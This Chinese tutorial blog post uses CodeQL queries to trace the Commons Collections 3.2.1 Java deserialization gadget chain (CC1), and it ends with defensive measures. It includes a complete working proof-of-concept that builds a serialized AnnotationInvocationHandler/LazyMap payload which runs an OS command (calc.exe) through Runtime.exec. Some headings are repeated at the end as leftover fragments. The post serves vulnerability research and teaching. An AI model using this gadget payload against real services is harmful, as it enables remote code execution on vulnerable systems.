CodeQL分析Java反序列化Gadget：CC1链详解<\/h1>

0x00 前言<\/h2>
本文将通过CodeQL工具分析Commons Collections 3.2.1中的反序列化漏洞链（CC1链），面向Java反序列化初学者和CodeQL工具初学者。我们将从底层方法开始，逐步构建完整的利用链。<\/p>

0x01 环境构建<\/h2>

所需环境<\/h3>

源码下载<\/strong>：commons-collections-3.2.1-src.zip<\/li>

构建工具<\/strong>：

JDK 7（Commons Collections 3.2.1不支持JDK8）<\/li>
对应版本的Maven<\/li> <\/ul> <\/li>
CodeQL数据库<\/strong>：

建议使用JDK8u101版本的数据库<\/li>
下载链接：百度网盘<\/a> 提取码: 34a3<\/li> <\/ul> <\/li> <\/ol>
构建步骤<\/h3>

使用JDK7编译Commons Collections 3.2.1源码<\/li>
使用CodeQL创建数据库：
codeql database create --language=<\/span>java --command=<\/span>"mvn clean install"<\/span> .\/cc3.2.1-db <\/span><\/span><\/code><\/pre><\/li> <\/ol> 0x02 漏洞链分析<\/h2> 第一阶段：Method.invoke调用点<\/h3> 我们从Method.invoke<\/code>方法作为起点开始分析，寻找可以被反序列化的类中调用此方法的位置。<\/p> CodeQL查询<\/strong>：<\/p> from MethodAccess ma, Method m where m.getName() = "invoke" and m.getDeclaringType().hasQualifiedName("java.lang.reflect", "Method") and ma.getMethod() = m and ma.getEnclosingCallable().getDeclaringType().getASupertype*().hasQualifiedName("java.io", "Serializable") select ma <\/code><\/pre> 查询结果分析<\/strong>：<\/p> InvokerTransformer.transform()<\/code>方法 - CC1链的核心部分<\/li> PrototypeCloneFactory.clone()<\/code>方法 - 可利用性较低<\/li> <\/ol> InvokerTransformer分析<\/h3> InvokerTransformer.transform()<\/code>方法关键代码：<\/p> public<\/span> Object transform<\/span>(<\/span>Object input)<\/span> {<\/span> <\/span><\/span> if<\/span> (<\/span>input ==<\/span> null<\/span>)<\/span> {<\/span> <\/span><\/span> return<\/span> null<\/span>;<\/span> <\/span><\/span> }<\/span> <\/span><\/span> try<\/span> {<\/span> <\/span><\/span> Class cls =<\/span> input.<\/span>getClass<\/span>();<\/span> <\/span><\/span> Method method =<\/span> cls.<\/span>getMethod<\/span>(<\/span>iMethodName,<\/span> iParamTypes);<\/span> <\/span><\/span> return<\/span> method.<\/span>invoke<\/span>(<\/span>input,<\/span> iArgs);<\/span> <\/span><\/span> }<\/span> catch<\/span> (...)<\/span> {<\/span> <\/span><\/span> \/\/ 异常处理 <\/span><\/span><\/span><\/span> }<\/span> <\/span><\/span>}<\/span> <\/span><\/span><\/code><\/pre>可控参数：<\/p> iMethodName<\/code> - 方法名<\/li> iParamTypes<\/code> - 参数类型数组<\/li> iArgs<\/code> - 参数数组<\/li> <\/ol> 第二阶段：Transformer链式调用<\/h3> 我们需要寻找能够将多个transform<\/code>操作串联执行的类。<\/p> CodeQL查询<\/strong>：<\/p> from Class c, Method m, MethodAccess ma where c.getASupertype*().hasQualifiedName("org.apache.commons.collections", "Transformer") and m.getDeclaringType() = c and m.getName() = "transform" and ma.getEnclosingCallable() = m and exists(ma.getMethod().getDeclaringType().getASupertype*() super | super.hasQualifiedName("org.apache.commons.collections", "Transformer") ) select c, m, ma <\/code><\/pre> 关键发现<\/strong>：<\/p> ChainedTransformer<\/code>类：可以串联执行多个Transformer<\/code>的transform<\/code>方法<\/li> ConstantTransformer<\/code>类：无论输入是什么，都返回固定值<\/li> <\/ul> ChainedTransformer分析<\/h3> ChainedTransformer.transform()<\/code>方法：<\/p> public<\/span> Object transform<\/span>(<\/span>Object object)<\/span> {<\/span> <\/span><\/span> for<\/span> (<\/span>int<\/span> i =<\/span> 0<\/span>;<\/span> i <<\/span> iTransformers.<\/span>length<\/span>;<\/span> i++)<\/span> {<\/span> <\/span><\/span> object =<\/span> iTransformers[<\/span>i].<\/span>transform<\/span>(<\/span>object);<\/span> <\/span><\/span> }<\/span> <\/span><\/span> return<\/span> object;<\/span> <\/span><\/span>}<\/span> <\/span><\/span><\/code><\/pre>利用思路：<\/p> 构造Transformer<\/code>数组： Transformer[]<\/span> transformers =<\/span> new<\/span> Transformer[]<\/span> {<\/span> <\/span><\/span> new<\/span> ConstantTransformer(<\/span>Runtime.<\/span>class<\/span>),<\/span> <\/span><\/span> new<\/span> InvokerTransformer(<\/span>"getMethod"<\/span>,<\/span> <\/span><\/span> new<\/span> Class[]{<\/span>String.<\/span>class<\/span>,<\/span> Class[].<\/span>class<\/span>},<\/span> <\/span><\/span> new<\/span> Object[]{<\/span>"getRuntime"<\/span>,<\/span> new<\/span> Class[<\/span>0<\/span>]}),<\/span> <\/span><\/span> new<\/span> InvokerTransformer(<\/span>"invoke"<\/span>,<\/span> <\/span><\/span> new<\/span> Class[]{<\/span>Object.<\/span>class<\/span>,<\/span> Object[].<\/span>class<\/span>},<\/span> <\/span><\/span> new<\/span> Object[]{<\/span>null<\/span>,<\/span> new<\/span> Object[<\/span>0<\/span>]}),<\/span> <\/span><\/span> new<\/span> InvokerTransformer(<\/span>"exec"<\/span>,<\/span> <\/span><\/span> new<\/span> Class[]{<\/span>String.<\/span>class<\/span>},<\/span> <\/span><\/span> new<\/span> Object[]{<\/span>"calc.exe"<\/span>})<\/span> <\/span><\/span>};<\/span> <\/span><\/span><\/code><\/pre><\/li> 创建ChainedTransformer<\/code>实例并执行<\/li> <\/ol> 第三阶段：触发transform调用<\/h3> 我们需要找到调用ChainedTransformer.transform<\/code>的类，要求：<\/p> 实现Serializable<\/code>接口<\/li> 方法名不是transform<\/code>（避免无限递归）<\/li> 方法体中调用Transformer<\/code>接口的transform<\/code>方法<\/li> <\/ol> CodeQL查询<\/strong>：<\/p> from Class c, Method m, MethodAccess ma, RefType transformer where c.getASupertype*().hasQualifiedName("java.io", "Serializable") and m.getDeclaringType() = c and m.getName() != "transform" and ma.getEnclosingCallable() = m and transformer.hasQualifiedName("org.apache.commons.collections", "Transformer") and ma.getMethod().getDeclaringType().getASupertype*() = transformer select c, m, ma <\/code><\/pre> 关键发现<\/strong>：<\/p> LazyMap.get()<\/code>方法：当key不存在时，会调用factory.transform(key)<\/code><\/li> <\/ul> LazyMap分析<\/h3> LazyMap.get()<\/code>方法：<\/p> public<\/span> Object get<\/span>(<\/span>Object key)<\/span> {<\/span> <\/span><\/span> if<\/span> (!<\/span>map.<\/span>containsKey<\/span>(<\/span>key))<\/span> {<\/span> <\/span><\/span> Object value =<\/span> factory.<\/span>transform<\/span>(<\/span>key);<\/span> <\/span><\/span> map.<\/span>put<\/span>(<\/span>key,<\/span> value);<\/span> <\/span><\/span> return<\/span> value;<\/span> <\/span><\/span> }<\/span> <\/span><\/span> return<\/span> map.<\/span>get<\/span>(<\/span>key);<\/span> <\/span><\/span>}<\/span> <\/span><\/span><\/code><\/pre>利用方式：<\/p> 通过LazyMap.decorate()<\/code>方法设置恶意的Transformer<\/code><\/li> 触发get()<\/code>方法调用<\/li> <\/ol> 第四阶段：触发LazyMap.get调用<\/h3> 寻找调用LazyMap.get()<\/code>的类，要求：<\/p> 实现Serializable<\/code>接口<\/li> 方法体中调用Map.get()<\/code>方法<\/li> get()<\/code>方法只有一个参数<\/li> 调用的是Map<\/code>接口或其实现类的方法<\/li> 最好有readObject<\/code>方法调用<\/li> <\/ol> CodeQL查询<\/strong>：<\/p> from Class c, Method m, MethodAccess ma, Parameter p, Method getMethod where c.getASupertype*().hasQualifiedName("java.io", "Serializable") and m.getDeclaringType() = c and ma.getEnclosingCallable() = m and getMethod.getName() = "get" and getMethod.getNumberOfParameters() = 1 and (getMethod.getDeclaringType().hasQualifiedName("java.util", "Map") or getMethod.getDeclaringType().getASupertype*().hasQualifiedName("java.util", "Map")) and ma.getMethod() = getMethod and exists(m.getSource().find("readObject")) select c, m, ma <\/code><\/pre> 关键发现<\/strong>：<\/p> AnnotationInvocationHandler<\/code>类：实现了InvocationHandler<\/code>接口（支持动态代理）<\/li> invoke()<\/code>方法会调用memberValues.get()<\/code><\/li> readObject()<\/code>方法会触发代理调用<\/li> <\/ul> <\/li> <\/ul> 动态代理机制<\/h3> 利用动态代理触发LazyMap.get()<\/code>：<\/p> 创建LazyMap<\/code>实例并设置恶意的Transformer<\/code><\/li> 使用AnnotationInvocationHandler<\/code>作为代理的InvocationHandler<\/code><\/li> 代理对象调用任何方法（除了toString<\/code>、hashCode<\/code>、equals<\/code>等）都会触发invoke<\/code>方法<\/li> invoke<\/code>方法会调用memberValues.get()<\/code><\/li> <\/ol> 0x03 完整利用链<\/h2> 利用链流程<\/h3> 反序列化AnnotationInvocationHandler<\/code>实例<\/li> readObject<\/code>方法触发代理对象的entrySet<\/code>方法调用<\/li> 代理机制调用AnnotationInvocationHandler.invoke<\/code>方法<\/li> invoke<\/code>方法调用memberValues.get()<\/code><\/li> memberValues<\/code>是LazyMap<\/code>实例，触发get()<\/code>方法<\/li> get()<\/code>方法调用factory.transform()<\/code><\/li> factory<\/code>是ChainedTransformer<\/code>实例，执行一系列transform<\/code>调用<\/li> 最终通过反射执行任意命令<\/li> <\/ol> POC构造<\/h3> import<\/span> org.apache.commons.collections.Transformer;<\/span> <\/span><\/span>import<\/span> org.apache.commons.collections.functors.ChainedTransformer;<\/span> <\/span><\/span>import<\/span> org.apache.commons.collections.functors.ConstantTransformer;<\/span> <\/span><\/span>import<\/span> org.apache.commons.collections.functors.InvokerTransformer;<\/span> <\/span><\/span>import<\/span> org.apache.commons.collections.map.LazyMap;<\/span> <\/span><\/span> <\/span><\/span>import<\/span> java.io.*;<\/span> <\/span><\/span>import<\/span> java.lang.reflect.Constructor;<\/span> <\/span><\/span>import<\/span> java.lang.reflect.InvocationHandler;<\/span> <\/span><\/span>import<\/span> java.lang.reflect.Proxy;<\/span> <\/span><\/span>import<\/span> java.util.HashMap;<\/span> <\/span><\/span>import<\/span> java.util.Map;<\/span> <\/span><\/span> <\/span><\/span>public<\/span> class<\/span> CC1POC<\/span> {<\/span> <\/span><\/span> public<\/span> static<\/span> void<\/span> main<\/span>(<\/span>String[]<\/span> args)<\/span> throws<\/span> Exception {<\/span> <\/span><\/span> \/\/ 构造Transformer链 <\/span><\/span><\/span><\/span> Transformer[]<\/span> transformers =<\/span> new<\/span> Transformer[]<\/span> {<\/span> <\/span><\/span> new<\/span> ConstantTransformer(<\/span>Runtime.<\/span>class<\/span>),<\/span> <\/span><\/span> new<\/span> InvokerTransformer(<\/span>"getMethod"<\/span>,<\/span> <\/span><\/span> new<\/span> Class[]{<\/span>String.<\/span>class<\/span>,<\/span> Class[].<\/span>class<\/span>},<\/span> <\/span><\/span> new<\/span> Object[]{<\/span>"getRuntime"<\/span>,<\/span> new<\/span> Class[<\/span>0<\/span>]}),<\/span> <\/span><\/span> new<\/span> InvokerTransformer(<\/span>"invoke"<\/span>,<\/span> <\/span><\/span> new<\/span> Class[]{<\/span>Object.<\/span>class<\/span>,<\/span> Object[].<\/span>class<\/span>},<\/span> <\/span><\/span> new<\/span> Object[]{<\/span>null<\/span>,<\/span> new<\/span> Object[<\/span>0<\/span>]}),<\/span> <\/span><\/span> new<\/span> InvokerTransformer(<\/span>"exec"<\/span>,<\/span> <\/span><\/span> new<\/span> Class[]{<\/span>String.<\/span>class<\/span>},<\/span> <\/span><\/span> new<\/span> Object[]{<\/span>"calc.exe"<\/span>})<\/span> <\/span><\/span> };<\/span> <\/span><\/span> <\/span><\/span> Transformer chainedTransformer =<\/span> new<\/span> ChainedTransformer(<\/span>transformers);<\/span> <\/span><\/span> <\/span><\/span> \/\/ 创建LazyMap <\/span><\/span><\/span><\/span> Map innerMap =<\/span> new<\/span> HashMap();<\/span> <\/span><\/span> Map lazyMap =<\/span> LazyMap.<\/span>decorate<\/span>(<\/span>innerMap,<\/span> chainedTransformer);<\/span> <\/span><\/span> <\/span><\/span> \/\/ 创建动态代理 <\/span><\/span><\/span><\/span> Class<?><\/span> clazz =<\/span> Class.<\/span>forName<\/span>(<\/span>"sun.reflect.annotation.AnnotationInvocationHandler"<\/span>);<\/span> <\/span><\/span> Constructor<?><\/span> constructor =<\/span> clazz.<\/span>getDeclaredConstructors<\/span>()[<\/span>0<\/span>];<\/span> <\/span><\/span> constructor.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span> <\/span><\/span> <\/span><\/span> InvocationHandler handler =<\/span> (<\/span>InvocationHandler)<\/span> constructor.<\/span>newInstance<\/span>(<\/span> <\/span><\/span> Override.<\/span>class<\/span>,<\/span> lazyMap);<\/span> <\/span><\/span> <\/span><\/span> Map proxyMap =<\/span> (<\/span>Map)<\/span> Proxy.<\/span>newProxyInstance<\/span>(<\/span> <\/span><\/span> Map.<\/span>class<\/span>.<\/span>getClassLoader<\/span>(),<\/span> <\/span><\/span> new<\/span> Class[]{<\/span>Map.<\/span>class<\/span>},<\/span> <\/span><\/span> handler);<\/span> <\/span><\/span> <\/span><\/span> \/\/ 创建AnnotationInvocationHandler实例 <\/span><\/span><\/span><\/span> InvocationHandler handler2 =<\/span> (<\/span>InvocationHandler)<\/span> constructor.<\/span>newInstance<\/span>(<\/span> <\/span><\/span> Override.<\/span>class<\/span>,<\/span> proxyMap);<\/span> <\/span><\/span> <\/span><\/span> \/\/ 序列化 <\/span><\/span><\/span><\/span> ByteArrayOutputStream baos =<\/span> new<\/span> ByteArrayOutputStream();<\/span> <\/span><\/span> ObjectOutputStream oos =<\/span> new<\/span> ObjectOutputStream(<\/span>baos);<\/span> <\/span><\/span> oos.<\/span>writeObject<\/span>(<\/span>handler2);<\/span> <\/span><\/span> oos.<\/span>close<\/span>();<\/span> <\/span><\/span> <\/span><\/span> \/\/ 反序列化触发 <\/span><\/span><\/span><\/span> ObjectInputStream ois =<\/span> new<\/span> ObjectInputStream(<\/span> <\/span><\/span> new<\/span> ByteArrayInputStream(<\/span>baos.<\/span>toByteArray<\/span>()));<\/span> <\/span><\/span> ois.<\/span>readObject<\/span>();<\/span> <\/span><\/span> }<\/span> <\/span><\/span>}<\/span> <\/span><\/span><\/code><\/pre>0x04 防御措施<\/h2> 升级Commons Collections到最新版本（3.2.2+或4.0+）<\/li> 使用JDK内置的序列化过滤器（JEP 290）<\/li> 避免反序列化不可信数据<\/li> 使用白名单机制限制可反序列化的类<\/li> <\/ol> 0x05 总结<\/h2> 通过CodeQL静态分析，我们完整地还原了CC1反序列化漏洞链的挖掘过程：<\/p> 从Method.invoke<\/code>调用点开始<\/li> 分析InvokerTransformer<\/code>的可控参数<\/li> 寻找Transformer<\/code>链式调用机制（ChainedTransformer<\/code>）<\/li> 寻找触发transform<\/code>调用的入口（LazyMap<\/code>）<\/li> 通过动态代理机制（AnnotationInvocationHandler<\/code>）触发整个利用链<\/li> <\/ol> 这种分析方法不仅适用于CC1链，也可以应用于其他反序列化漏洞的研究和挖掘。<\/p>

CodeQL分析Java反序列化Gadget：CC1链详解<\/h1>

0x00 前言<\/h2> 本文将通过CodeQL工具分析Commons Collections 3.2.1中的反序列化漏洞链（CC1链），面向Java反序列化初学者和CodeQL工具初学者。我们将从底层方法开始，逐步构建完整的利用链。<\/p>

0x01 环境构建<\/h2>

0x02 漏洞链分析<\/h2>

0x03 完整利用链<\/h2>

0x00 前言<\/h2>
本文将通过CodeQL工具分析Commons Collections 3.2.1中的反序列化漏洞链（CC1链），面向Java反序列化初学者和CodeQL工具初学者。我们将从底层方法开始，逐步构建完整的利用链。<\/p>